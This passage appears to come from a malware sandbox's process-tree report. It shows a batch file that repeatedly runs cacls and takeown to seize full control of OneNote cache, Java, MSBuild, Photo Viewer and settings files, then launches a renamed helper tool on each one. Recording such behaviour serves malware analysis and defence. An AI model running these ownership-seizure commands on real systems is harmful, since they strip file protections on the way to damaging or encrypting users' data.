                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8356
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7188
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7184
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000006U.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4856
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula "0000006U.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3940
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3468
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6508
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5172
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000078.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7164
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "00000078.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7860
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7832
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6108
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3460
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6796
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000007I.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:224
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "0000007I.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6524
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1240
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000008H.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "0000008H.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "classes.jsa" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula "classes.jsa" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "settings.dat" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "settings.dat" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "settings.dat" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "settings.dat" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.9f3b6ed0-ceac-45f6-a2f1-3b8896126fcc.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.9f3b6ed0-ceac-45f6-a2f1-3b8896126fcc.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.9f3b6ed0-ceac-45f6-a2f1-3b8896126fcc.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "UpdateSessionOrchestration.9f3b6ed0-ceac-45f6-a2f1-3b8896126fcc.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "UpdateSessionOrchestration.9f3b6ed0-ceac-45f6-a2f1-3b8896126fcc.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.37f1f5c4-8d32-4284-ab37-6dbf80cd2a48.1.etl""
